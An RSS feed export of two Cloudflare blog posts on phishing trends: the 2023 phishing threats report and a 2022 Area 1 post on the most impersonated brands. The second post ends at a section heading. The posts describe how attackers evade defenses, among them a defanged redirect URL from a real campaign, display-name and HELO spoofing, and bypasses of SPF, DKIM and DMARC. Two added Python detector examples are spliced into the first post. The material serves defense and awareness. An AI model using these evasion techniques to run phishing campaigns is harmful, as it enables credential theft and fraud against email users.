
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Thu, 09 Apr 2026 20:34:36 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Introducing Cloudflare's 2023 phishing threats report]]></title>
            <link>https://blog.cloudflare.com/2023-phishing-report/</link>
            <pubDate>Wed, 16 Aug 2023 09:13:17 GMT</pubDate>
            <description><![CDATA[ The 2023 Phishing Threats Report analyzes millions of malicious emails, brand impersonation examples, identity deception and other key attack trends based on email security data from a 12-month period ]]></description>
            <content:encoded><![CDATA[
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4zKdGorR5BXoIDN9iE1c2y/ef2bc7e7b92d5b73dd48caba515210bb/Introducing-Cloudflare-2023-phishing-threats-report-1.png" />
            
            </figure><p>After shutting down a ‘phishing-as-a-service’ operation that impacted thousands of victims in 43 countries, INTERPOL recently <a href="https://www.interpol.int/en/News-and-Events/News/2023/Notorious-phishing-platform-shut-down-arrests-in-international-police-operation?">noted</a>, “Cyberattacks such as phishing may be borderless and virtual in nature, but their impact on victims is real and devastating.” Business email compromise (<a href="https://www.cloudflare.com/learning/email-security/business-email-compromise-bec/">BEC</a>), a malware-less attack that tricks recipients into, for example, transferring funds, has <a href="https://www.ic3.gov/Media/Y2023/PSA230609">cost</a> victims worldwide more than $50 billion, according to the FBI.</p><p>It is estimated that 90% of successful cyber attacks <a href="https://www.cisa.gov/shields-guidance-families">start</a> with email <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing</a>, which continues to be very lucrative for attackers. There is not much today that can be done to stop phishing <i>attempts</i>. However, to <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">prevent <i>successful</i> attacks</a>, it is important to understand (and proactively address) evolving phishing trends — including the ways attackers cleverly exploit intended victims’ trust in “known” email senders. To that end, this week Cloudflare published its first <a href="https://www.cloudflare.com/lp/2023-phishing-report/">Phishing Threats Report</a>.</p><p>This report explores key phishing trends and related recommendations, based on <a href="https://www.cloudflare.com/zero-trust/products/email-security/">email security</a> data from May 2022 to May 2023. During that time, Cloudflare <b>processed approximately 13 billion emails</b>, which included blocking approximately <b>250 million malicious messages</b> from reaching customers’ inboxes. 
The report is also informed by a Cloudflare-commissioned <b>survey of 316 security decision-makers</b> across North America, EMEA, and APAC (you can download that separate study <a href="https://www.cloudflare.com/lp/zero-trust-to-combat-multichannel-phishing/">here</a>).</p><p>Check out the full report to understand our three key takeaways:</p><ul><li><p><b>Attackers using deceptive links as the #1 phishing tactic</b> — and how they are evolving how they get you to click and when they weaponize the link;</p></li><li><p><b>Identity deception</b> takes multiple forms (including business email compromise (BEC) and brand impersonation), <b>and can easily bypass email authentication standards;</b></p></li><li><p>Attackers pretend to be hundreds of different organizations, but they <b>primarily impersonate the entities we trust</b> and need to get work done.</p></li></ul><p>Here are a few other things to keep in mind as you read the 2023 Phishing Threats report.</p>
    <div>
      <h3>Email threat categorization</h3>
      <a href="#email-threat-categorization">
        
      </a>
    </div>
    <p>Attackers typically use a combination of <a href="https://www.cloudflare.com/learning/security/threats/social-engineering-attack/">social engineering</a> and technical obfuscation techniques to make their messages seem legitimate. Therefore, Cloudflare uses a number of advanced detection techniques to analyze “fuzzy” signals (not just content that’s visible to the naked eye) to identify unwanted emails. Those signals include:</p><ul><li><p><b>Structural analysis</b> of headers, body copy, images, links, attachments, payloads, and more, using heuristics and <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning models</a> specifically designed for phishing signals;</p></li><li><p><b>Sentiment analysis</b> to detect changes in patterns and behaviors (e.g., writing patterns and expressions);</p></li><li><p><b>Trust graphs</b> that evaluate partner social graphs, email sending history, and potential partner impersonations</p></li></ul><p>Our <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">email security service</a> also incorporates <a href="https://www.cloudflare.com/learning/security/glossary/threat-intelligence-feed/">threat intelligence</a> from Cloudflare’s global network, which blocks an average of 140 billion cyber threats each day.</p><p>Those and many other signals lead to email dispositions of malicious, BEC, spoof, or spam; our dashboard tells customers the specific reasons (i.e., the threat indicator ‘categories’) for a particular email disposition.</p><p>Below is a snapshot of the top email threat indicators we observed between May 2, 2022, to May 2, 2023. We categorize threat indicators into more than 30 different categories; over that period, the top threat indicators included <b>deceptive links</b>, <b>domain age</b> (newly registered domains), <b>identity deception</b>, <b>credential harvesting</b>, and <b>brand impersonation</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/JfZOoAKRayGTRMdjkwQOn/502f97161f6cdd8ba4614e299e5f6fc9/image4-6.png" />
            
            </figure><p>Below are brief descriptions of each of the top categories (detailed in more depth in the report’s appendix).</p><p>If clicked, a <b>deceptive link</b> will open the user’s default web browser and render the data referenced in the link, or open an application directly (e.g. a PDF). Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when it is in fact malicious.</p><p><b>Domain age</b> is related to domain reputation, which is the overall score assigned to a domain. For example, domains that send out numerous new emails immediately after domain registration will tend to have a poorer reputation, and thus a lower score.</p><p><b>Identity deception</b> occurs when an attacker or someone with malicious intent sends an email claiming to be someone else. The mechanisms and tactics of this vary widely. Tactics include registering lookalike domains (domain impersonation), spoofing the sending domain, or using display name tricks to appear to come from a trusted domain. Other variations include sending email using domain fronting and high-reputation web services platforms.</p><p><b>Credential harvesters</b> are set up by an attacker to deceive users into providing their login credentials. Unwitting users may enter their credentials, ultimately providing attackers with access to their accounts.</p><p><b>Brand impersonation</b> is a form of identity deception where an attacker sends a phishing message that impersonates a recognizable company or brand. Brand impersonation is conducted using a wide range of techniques.</p><p>A malicious <b>attachment</b> is a file attached to an email that, when opened or executed in the context of an attack, presents a call-to-action (e.g. lures the target into clicking a link) or performs a series of actions set by the attacker.</p><p>Cloudflare regularly observes multiple threat indicators in one phishing email. 
For example, one Silicon Valley Bank-themed phishing campaign (detailed in <a href="/how-sophisticated-scammers-and-phishers-are-preying-on-customers-of-silicon-valley-bank/">this</a> March 2023 blog) combined <i>brand impersonation</i> with a <i>deceptive link</i> and <i>malicious attachment</i>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4uyngezMfEcC6gf784nyV6/225bc53f509017a05329698ccea01c74/image3-5.png" />
            
            </figure><p>The attackers leveraged the SVB brand in a DocuSign-themed template. The email included HTML code containing an initial link and a complex redirect chain four levels deep. The HTML file included in the attack would have sent the recipient to a WordPress instance with recursive redirection capability.</p><p>(Speaking of links, deceptive links were the <b>#1 threat category,</b> appearing in <b>35.6% of our detections</b>. And attackers aren’t just using links in email channels; the rise of multi-channel phishing threats — which exploit other applications such as SMS/text, chat, and social media — is also covered in the report.)</p>
    <div>
      <h3>Trusted (and most impersonated) brands</h3>
      <a href="#trusted-and-most-impersonated-brands">
        
      </a>
    </div>
    <p>Silicon Valley Bank was just one of <b>approximately 1,000 different brands</b> we observed being impersonated in emails targeting Cloudflare customers between May 2022 and May 2023. (Cloudflare employees were directly targeted via brand impersonation in the “Oktapus” phishing attack that the <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a> suite of products <a href="/2022-07-sms-phishing-attacks/">thwarted</a> in July 2022).</p><p>However, as detailed in the Phishing Threats Report, we observed that email attackers most often (51.7% of the time) impersonated one of 20 well-known global brands, with <b>Microsoft</b> being #1 on their list.</p>
<table>
<thead>
  <tr>
    <th><span>Rank</span></th>
    <th><span>Impersonated brand</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>1</span></td>
    <td><span>Microsoft</span></td>
  </tr>
  <tr>
    <td><span>2</span></td>
    <td><span>World Health Organization</span></td>
  </tr>
  <tr>
    <td><span>3</span></td>
    <td><span>Google</span></td>
  </tr>
  <tr>
    <td><span>4</span></td>
    <td><span>SpaceX</span></td>
  </tr>
  <tr>
    <td><span>5</span></td>
    <td><span>Salesforce</span></td>
  </tr>
  <tr>
    <td><span>6</span></td>
    <td><span>Apple</span></td>
  </tr>
  <tr>
    <td><span>7</span></td>
    <td><span>Amazon</span></td>
  </tr>
  <tr>
    <td><span>8</span></td>
    <td><span>T-Mobile</span></td>
  </tr>
  <tr>
    <td><span>9</span></td>
    <td><span>YouTube</span></td>
  </tr>
  <tr>
    <td><span>10</span></td>
    <td><span>MasterCard</span></td>
  </tr>
  <tr>
    <td><span>11</span></td>
    <td><span>Notion.so</span></td>
  </tr>
  <tr>
    <td><span>12</span></td>
    <td><span>Comcast</span></td>
  </tr>
  <tr>
    <td><span>13</span></td>
    <td><span>Line Pay</span></td>
  </tr>
  <tr>
    <td><span>14</span></td>
    <td><span>MasterClass</span></td>
  </tr>
  <tr>
    <td><span>15</span></td>
    <td><span>Box</span></td>
  </tr>
  <tr>
    <td><span>16</span></td>
    <td><span>Truist Financial Corp</span></td>
  </tr>
  <tr>
    <td><span>17</span></td>
    <td><span>Facebook</span></td>
  </tr>
  <tr>
    <td><span>18</span></td>
    <td><span>Instagram</span></td>
  </tr>
  <tr>
    <td><span>19</span></td>
    <td><span>AT&amp;T</span></td>
  </tr>
  <tr>
    <td><span>20</span></td>
    <td><span>Louis Vuitton</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Example of a Microsoft credential harvesting attempt</h3>
      <a href="#example-of-a-microsoft-credential-harvesting-attempt">
        
      </a>
    </div>
    <p>Earlier this year, Cloudflare detected and blocked a phishing campaign leveraging the Microsoft brand in an attempt to harvest credentials through a legitimate — but compromised — site.</p><p>In the email example below, there is no text in the body of the email despite its appearance. The entire body is a hyperlinked JPEG image. Thus, if the recipient clicks anywhere in the body (even if they don’t intend to click the link), they are effectively clicking the link.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7awKbnZvPkxboytqFmUaGl/7506202a224e5b3ee8736074d7d7e7d0/image1-16.png" />
            
            </figure><p>Initially, the hyperlink for this image appears to be a benign Baidu URL - hxxp://www.baidu[.]com/link?url=-yee3T9X9U41UHUa3VV6lx1j5eX2EoI6XpZqfDgDcf-2NYQ8RVpOn5OYkDTuk8Wg#&lt;recipient’s email address base64 encoded&gt;.  However, if this link is clicked, the target’s browser would be redirected to a site that had been compromised and used to host a credential harvester.</p><p>The attacker used Microsoft Office 365 branding, but attempted to circumvent any brand detection techniques by including the brand information within the image (i.e., there was no plaintext or HTML text that could be inspected to identify the brand).</p><p>However, using optical character recognition (OCR), Cloudflare successfully identified “Office 365” and “Microsoft” in the image. Using OCR, we also identified the use of suspicious account lures related to passwords.</p><p>In this example, attackers’ techniques included:</p><ul><li><p>Inclusion of only a JPEG image (impossible to detect words without OCR)</p></li><li><p>Embedding a hyperlink in that image (clicking anywhere in the body would result in clicking the link)</p></li><li><p>Hyperlinking to a Baidu URL (used to bypass reputation-based URL detection techniques)</p></li><li><p>The Baidu URL redirecting the recipient’s browser to a credential harvesting site (i.e., would circumvent other email security defenses that are not capable of deep link inspection)</p></li><li><p>Hosting the credential harvester on a legitimate site that had been compromised by the attacker (even with deep link inspection, will again attempt to bypass URL detection techniques based on reputation)</p></li></ul><p>This attack vector leverages the high reputation and authenticity of Baidu to bypass the reputation of the true host/IP where the credential harvester is hosted.</p><p>While this specific campaign focused on harvesting Microsoft credentials, we often see attackers using similar methods to bypass brand detection techniques and 
trick victims into downloading <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/">malware</a> and other <a href="https://www.cloudflare.com/learning/security/glossary/malicious-payload/">malicious payloads</a>.</p><p>URL redirection techniques are often seen in phishing campaigns, but threat actors are continuing to refine their approach by abusing more and more legitimate domains like <a href="http://baidu.com">baidu.com</a>, <a href="http://bing.com">bing.com</a>, <a href="http://goo.gl">goo.gl</a>, etc. Our numerous detection capabilities allow us to conduct deep link inspection of URLs using redirection techniques of all kinds, including those that abuse legitimate domains.</p>
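The link indicators described under deceptive links and in the Microsoft example above can be checked mechanically; the following is an added example (not Cloudflare's code and not the detection engine this post describes) that parses an HTML email body with the Python standard library and flags link text naming a different host than its href, a URL carried inside another URL's query parameter, a hyperlinked image, and an image-only body with no inspectable text. The sample bodies and every hostname in them are constructed placeholders.

```python
"""Flag link-based phishing indicators in an HTML email body.

Added example, not Cloudflare's code: a stdlib-only analyzer for the
indicators described in the post (deceptive link text, URL-in-URL redirect
parameters, hyperlinked images, image-only bodies). Sample bodies and host
names below are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Display text that looks like a URL or bare domain, e.g. "https://www.microsoft.com/reset"
URL_LIKE = re.compile(r"^(?:https?://)?(?:www\.)?[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}(?:/\S*)?$", re.I)


def host_of(url: str) -> str:
    """Lower-cased host of a URL with a leading 'www.' stripped; '' if none."""
    host = (urlparse(url if "://" in url else "http://" + url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def embedded_redirect_target(href: str) -> Optional[str]:
    """Return a full URL carried in a query parameter (e.g. ?url=https://...), else None."""
    for values in parse_qs(urlparse(href).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


class _BodyParser(HTMLParser):
    """Collects anchors (href, visible text, contains-image) plus text/image counts."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str, bool]] = []
        self._open: List[list] = []  # stack of [href, text_parts, has_img]
        self.text_chars = 0
        self.images = 0

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "a":
            self._open.append([attr.get("href") or "", [], False])
        elif tag == "img":
            self.images += 1
            if self._open:
                self._open[-1][2] = True

    def handle_endtag(self, tag):
        if tag == "a" and self._open:
            href, parts, has_img = self._open.pop()
            self.links.append((href, "".join(parts).strip(), has_img))

    def handle_data(self, data):
        if data.strip():
            self.text_chars += len(data.strip())
            if self._open:
                self._open[-1][1].append(data)


def analyze_body(html_body: str) -> List[Tuple[str, str, str]]:
    """Return (indicator, href, detail) tuples for the body; empty list if nothing fires."""
    parser = _BodyParser()
    parser.feed(html_body)
    parser.close()
    found = []
    for href, text, has_img in parser.links:
        # Visible text names one host while the href goes somewhere else.
        if text and URL_LIKE.match(text) and host_of(text) != host_of(href):
            found.append(("deceptive_link", href, text))
        # A high-reputation redirector carrying the real destination in a parameter.
        target = embedded_redirect_target(href)
        if target and host_of(target) != host_of(href):
            found.append(("redirect_parameter", href, target))
        # Clicking anywhere on the image follows the link.
        if has_img and not text:
            found.append(("hyperlinked_image", href, ""))
    if parser.images and parser.text_chars == 0:
        found.append(("image_only_body", "", ""))  # nothing to inspect without OCR
    return found


# Constructed samples (placeholder hosts, not real campaign infrastructure).
IMAGE_ONLY_LURE = (
    '<html><body><a href="https://redirector.example/link?url=https://harvester.example/login">'
    '<img src="cid:body.jpg" width="600"></a></body></html>'
)
DECEPTIVE_TEXT_LURE = (
    "<p>Your password expires today. Reset it at "
    '<a href="https://login-portal.example/reset">https://www.microsoft.com/reset</a></p>'
)
BENIGN_BODY = '<p>See the docs at <a href="https://www.example.com/docs">https://example.com/docs</a>.</p>'

if __name__ == "__main__":
    for name, body in [("image-only", IMAGE_ONLY_LURE), ("deceptive text", DECEPTIVE_TEXT_LURE), ("benign", BENIGN_BODY)]:
        print(name, analyze_body(body))
```

The `image_only_body` indicator is the point at which a real pipeline would hand the image to OCR, as the post describes.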
    <div>
      <h3>What about SPF, DKIM, and DMARC?</h3>
      <a href="#what-about-spf-dkim-and-dmarc">
        
      </a>
    </div>
    <p>Email authentication (specifically the <a href="https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/">SPF, DKIM, and DMARC</a> standards) is often mentioned as useful against brand impersonation: these standards help validate server and tenant origins, protect message integrity, provide policy enforcement, and more.</p><p>However, attackers can still find ways to bypass authentication to trick email suites; in fact, we observed that <b>89% of unwanted messages “passed”</b> SPF, DKIM, and/or DMARC checks.</p><p>Some limitations of email authentication include:</p>
<table>
<thead>
  <tr>
    <th><span>Standard</span></th>
    <th><span>Key benefits</span></th>
    <th><span>Limitations</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>SPF</span><br /><span>(Sender Policy Framework)</span></td>
    <td><span>Validating server origin (i.e., validates where a message originates from)</span><br /><span>Defining which email servers and services are allowed to send messages on a domain owner’s behalf</span></td>
    <td><span>Does not prevent lookalike email, domain, or display name </span><a href="https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/"><span>spoofing</span></a><br /><span>Does not validate the “From” header; uses the envelope “From” to determine the sending domain</span><br /><span>Validation is ineffective when emails are forwarded or when messages sent to a mailing list are redistributed to each subscriber</span><br /><span>The SPF evaluation process can be limited to a certain number of </span><a href="https://www.cloudflare.com/learning/dns/what-is-dns/"><span>DNS</span></a><span> lookups</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, </span><a href="https://www.cloudflare.com/learning/security/glossary/malicious-payload/"><span>malicious payloads</span></a><span>, or attachments</span></td>
  </tr>
  <tr>
    <td><span>DKIM</span><br /><span>(DomainKeys Identified Mail)</span></td>
    <td><span>Providing tenant origin validation (i.e., checks that an email was sent/authorized by the owner of the domain via a digital signature)</span><br /><span>Ensuring email is not altered while transferred from server to server; protecting message integrity</span></td>
    <td><span>Does not prevent lookalike email, domain, or display name spoofing</span><br /><span>Does not protect against </span><a href="https://developers.cloudflare.com/magic-wan/reference/anti-replay-protection/"><span>replay attacks</span></a><span> (DKIM only signs specific parts of a message; attackers can add other header fields to emails that pass DKIM and then forward them)</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, malicious payloads, or attachments</span></td>
  </tr>
  <tr>
    <td><span>DMARC</span><br /><span>(Domain-based Message Authentication, Reporting and Conformance)</span></td>
    <td><span>Providing policy enforcement and reporting for SPF and DKIM</span><br /><span>Stipulating what policy to follow if an email doesn’t pass SPF or DKIM authentication (e.g. reject/delete, quarantine, no policy/send)</span><br /><span>Reporting function allows domain owners to see who is sending email on their behalf (i.e., protecting against spoofing of your own domain and brand abuse)</span></td>
    <td><span>Does not prevent spoofing of another brand’s domain</span><br /><span>Does not prevent lookalike email, domain, or display name spoofing</span><br /><span>Domain owners specify what percentage of mail the DMARC policy applies to; percentages below 100% are less effective</span><br /><span>Does not protect against attacks using “validated” emails with embedded URLs, malicious payloads, or attachments</span></td>
  </tr>
</tbody>
</table>
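Two rows of the table, SPF not validating the “From” header and none of the standards preventing lookalike or display name spoofing, can be shown directly in code; the added example below (not Cloudflare's code, and a simplified model of RFC 7489 identifier alignment that approximates the organizational domain as the last two labels) evaluates SPF and DKIM alignment against the header From domain and shows one direct spoof that DMARC rejects and one lookalike that passes every check. All domains and display names are constructed placeholders.

```python
"""Why 'passing' SPF/DKIM/DMARC does not mean a message is safe.

Added example, not Cloudflare's code. Simplified model of DMARC alignment
(RFC 7489): SPF is evaluated on the envelope MAIL FROM domain and DKIM on the
signing domain (d=), and DMARC only asks whether one of those is *aligned*
with the header From domain the recipient sees. The organizational domain is
approximated as the last two labels (assumption: no public-suffix list), which
is enough for these samples. All domains below are constructed placeholders.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Set


def org_domain(domain: str) -> str:
    """Approximate organizational domain: last two labels (no multi-label public suffixes)."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, header_from_domain: str, mode: str = "r") -> bool:
    """DMARC identifier alignment: strict ('s') needs an exact match, relaxed ('r') the same org domain."""
    if mode == "s":
        return auth_domain.lower() == header_from_domain.lower()
    return org_domain(auth_domain) == org_domain(header_from_domain)


@dataclass
class AuthResults:
    header_from_domain: str        # domain in the RFC5322.From header the user sees
    mail_from_domain: str          # envelope (RFC5321.MailFrom) domain SPF is checked against
    spf_result: str                # "pass" / "fail" / "none"
    dkim_result: str               # "pass" / "fail" / "none"
    dkim_d: Optional[str] = None   # d= tag of the verified DKIM signature, if any
    display_name: str = ""         # RFC5322.From display name, e.g. "Microsoft Account Team"


def dmarc_result(r: AuthResults, aspf: str = "r", adkim: str = "r") -> str:
    """Return 'pass' if an aligned SPF pass or an aligned DKIM pass exists, else 'fail'."""
    spf_ok = r.spf_result == "pass" and aligned(r.mail_from_domain, r.header_from_domain, aspf)
    dkim_ok = (r.dkim_result == "pass" and r.dkim_d is not None
               and aligned(r.dkim_d, r.header_from_domain, adkim))
    return "pass" if (spf_ok or dkim_ok) else "fail"


def display_name_mismatch(r: AuthResults, brand_domains: Dict[str, Set[str]]) -> Optional[str]:
    """Return the brand named in the display name when the From domain is not one of that brand's."""
    for brand, domains in brand_domains.items():
        if brand.lower() in r.display_name.lower() and org_domain(r.header_from_domain) not in domains:
            return brand
    return None


# Constructed samples.
BRANDS: Dict[str, Set[str]] = {"Microsoft": {"microsoft.example"}}

# 1. Direct spoof of the brand's own domain sent from attacker infrastructure:
#    SPF passes for the envelope domain, but nothing aligns with the header From.
DIRECT_SPOOF = AuthResults("microsoft.example", "bulk-sender.example", "pass", "none",
                           display_name="Microsoft Account Team")

# 2. Lookalike domain the attacker registered and configured properly: every check passes,
#    and only the display-name check notices the brand name on a foreign domain.
LOOKALIKE = AuthResults("rnicrosoft.example", "rnicrosoft.example", "pass", "pass",
                        dkim_d="rnicrosoft.example", display_name="Microsoft Account Team")

# 3. Legitimate mail relayed through the brand's own mail subdomain: relaxed alignment passes,
#    strict alignment would not.
LEGIT_RELAXED = AuthResults("microsoft.example", "mail.microsoft.example", "pass", "none")


def summarize(r: AuthResults) -> Dict[str, Optional[str]]:
    return {"dmarc": dmarc_result(r), "display_name_flag": display_name_mismatch(r, BRANDS)}


if __name__ == "__main__":
    for label, sample in [("direct spoof", DIRECT_SPOOF), ("lookalike", LOOKALIKE),
                          ("legit relaxed", LEGIT_RELAXED)]:
        print(label, summarize(sample))
```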
    <div>
      <h3>Conclusions</h3>
      <a href="#conclusions">
        
      </a>
    </div>
    <p>Attackers are constantly evolving their tactics. Multiple protection layers must be enacted before, during, and after messages reach the inbox. Cloudflare never inherently “trusts” any type of email communication (whether it appears to be internal, external, or from a ‘known’ business partner).</p><p>Likewise, we recommend that — first and foremost — all organizations extend the <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust security model</a> of “never trust, always verify” not just to the network and applications, but also to the email inbox.</p><p>In addition to <a href="https://www.cloudflare.com/zero-trust/products/email-security/">securing email</a> with a Zero Trust approach, we also recommend:</p><ul><li><p><b>Augmenting cloud email with multiple anti-phishing controls.</b> As noted in <a href="https://www.forrester.com/blogs/announcing-the-forrester-wave-enterprise-email-security-q2-2023/">this</a> Forrester blog from June, <i>“The use of messaging, collaboration, file sharing, and enterprise software-as-a-service applications across multiple devices all contribute to employee productivity and experience. Many of these environments are considered ‘closed,’ but one successful phish of a supply chain partner’s credentials opens your organization up to data loss, credential theft, fraud, and ransomware attacks. Protections developed for the email inbox must extend to these environments and throughout the day-to-day workflows of your employees.”</i></p></li><li><p><b>Adopting phishing-resistant multifactor authentication (</b><a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><b>MFA</b></a><b>).</b> While not all MFA provides the same layer of security, hardware security keys are among the most secure authentication methods for <a href="/how-cloudflare-implemented-fido2-and-zero-trust/">preventing successful phishing attacks</a>. 
They can protect networks even if attackers gain access to usernames and passwords.</p></li><li><p><b>Making it harder for humans to make mistakes.</b> Meet employees and teams where they are by making the tools they already use more secure, and preventing them from making mistakes. For example, remote browser isolation (<a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">RBI</a>) technology, when integrated with <a href="https://www.cloudflare.com/learning/email-security/what-is-email-security/">cloud email security</a>, can automatically isolate suspicious email links to prevent users from being exposed to potentially malicious web content. Keyboard inputs can also be disabled on untrusted websites, protecting users from accidentally entering sensitive information into a form or a credential harvesting page. This provides a layer of defense against multi-channel phishing attacks by effectively allowing users to safely open links without disrupting their workflow.</p></li></ul><p>If you’re interested in the full findings, you can download the 2023 Phishing Threats Report <a href="https://www.cloudflare.com/lp/2023-phishing-report/">here</a>, as well as our recommendations for preventing successful phishing attacks. And if you’d like to see Cloudflare’s email security in action, you can request a free phishing risk assessment <a href="https://www.cloudflare.com/lp/emailsecurity/">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">5r8tVebXSz3ESgfdLHjC7X</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
            <dc:creator>Juliette Cash</dc:creator>
        </item>
        <item>
            <title><![CDATA[Area 1 Security Announces the Most Spoofed Brand of 2021: WHO is Back Again?]]></title>
            <link>https://blog.cloudflare.com/2022-march-hackness-who-phished-brand/</link>
            <pubDate>Thu, 31 Mar 2022 12:34:00 GMT</pubDate>
            <description><![CDATA[ From Jan. 2021 to Jan. 2022, more than 8.5 million (of 56 million in total) brand phishing emails blocked by Area 1 impersonated the World Health Organization ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in March 2022 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Dear America’s sports-loving, company-securing fans: Before you find yourself glued this weekend to (what some call) <b>THE biggest game</b> in college basketball history, we are here to crown the 2022 March Hackness winner!</p><p>Also known as: the organization most impersonated by attackers in phishing campaigns in 2021.</p><p>Despite the shiny crop of newcomers to the Top 64 impersonated organizations (which included <b>Notion.so</b>, <b>Binance</b>, and grocery stores from <b>Costco</b> to <b>Kwik Shop</b>), our March Hackness “Final Four” ended up mirroring the 2022’s NCAA Men’s Final Four: with the <a href="https://www.usatoday.com/story/sports/ncaab/2022/03/27/kansas-bill-self-fourth-final-four-winners-losers-miami/7185222001/">blue blood</a> brands, that is.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1W1YsrZ38ES3VfT9k690du/b048e2d457f4fe0b20b7b072e04cb705/March-Hackness_Final_2-1.png" />
            
            </figure><p>That’s right, folks: on the heels of enduring the second year of the COVID-19 pandemic, the <b>World Health Organization</b> beat out <b>Amazon, Microsoft</b> and <b>T-Mobile</b> to become the back-to-back <b>winner of Area 1’s “ophishal” March Hackness title</b>!</p><p>From Jan. 2021 to Jan. 2022, a whopping <b>15% (over 8.5 million) of the 56 million brand phishing emails</b> blocked by Area 1 impersonated the WHO.</p><p>This timeframe (not coincidentally) coincides with the WHO remaining top of mind for global businesses closely monitoring the rollout of new vaccines and booster shots, as well as the rise of the Delta and Omicron variants.</p>
    <div>
      <h3>There’s Always Next Year’s Tournament…</h3>
      <a href="#theres-always-next-years-tournament">
        
      </a>
    </div>
    <p>The pandemic also influenced brand phishing in other ways. The “blue blood” of online retail and the cloud — and our March Hackness runner-up — <b>Amazon</b>, was impersonated in <b>over 3.2 million phishing</b> emails blocked by Area 1.</p><p>The focus of <a href="https://www.rd.com/article/amazon-email-scam/">Amazon scams</a> varies. However, as Area 1’s principal threat researcher, Juliette Cash, explains, common ones include phishing emails claiming that accounts have been ‘placed on hold,’ payments have been declined or that Prime memberships have ‘expired.’</p><p>These types of attacks utilize Amazon branding to impersonate official emails and entice victims to click links to update their credit card information. Once the link is clicked, the user’s browser will load malicious content and direct them to verify their identity and input their payment details.</p><p>While these messages can be sent at any time, we’ve found that they are commonly tied to events, such as Amazon Prime Day, that trigger individuals to take action in fear of missing out.</p><p>By the way, although Amazon vs. the WHO isn’t exactly the epic and storied rivalry of Duke vs. UNC, Amazon has been in our list of top 64 most impersonated brands ever since March Hackness’ inception … so, we’ll count this matchup as an important piece of cybersecurity history!</p><p>Now, we have no idea what it’s like pretending to be a Blue Devil or Tar Heel (or Jayhawk or Wildcat) for a basketball season, but we do know some things about bad actors’ impersonation tactics.</p><p><b>Identity deception</b> using tactics like spoofing, domain impersonation and display name impersonation shows how easily attackers can deceive users through brand phishing to reach their goals.</p><p>In many cases, it’s as simple as a display name change. 
However, there are (of course) much more complex phishing techniques that will evade standard defenses.</p><p>For example, in <a href="https://www.area1security.com/blog/pfizer-vaccine-phishing-campaign/">this 2021 vaccine phishing campaign</a> (which originally bypassed Microsoft Office 365’s native defenses before it was blocked by Area 1), attackers pretending to be the CDC:</p><ul><li><p>Used Display Name Spoofing to fake the visible FROM header</p></li><li><p>Inserted an SMTP HELO command to spoof the Envelope From domain</p></li><li><p>Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address</p></li><li><p>Compromised a legitimate host with a benign IP, and used it to launch their phishing attack</p></li></ul><p><i>That’s</i> what you call a playbook.</p><p>And speaking of <b>Microsoft</b>, it made our “Final Four” of most-phished brands for the fourth consecutive year.</p><p>Attackers not only frequently impersonate individual Microsoft tools, they also often use Microsoft’s own tools and branding to bypass legacy defenses and email authentication. (Just one example: this credential harvesting campaign specifically leveraged Microsoft SharePoint and Microsoft Planner).</p>
    <div>
      <h3>So, How Do <i>You</i> Guard Your Inbox?</h3>
      <a href="#so-how-do-you-guard-your-inbox">
        
      </a>
    </div>
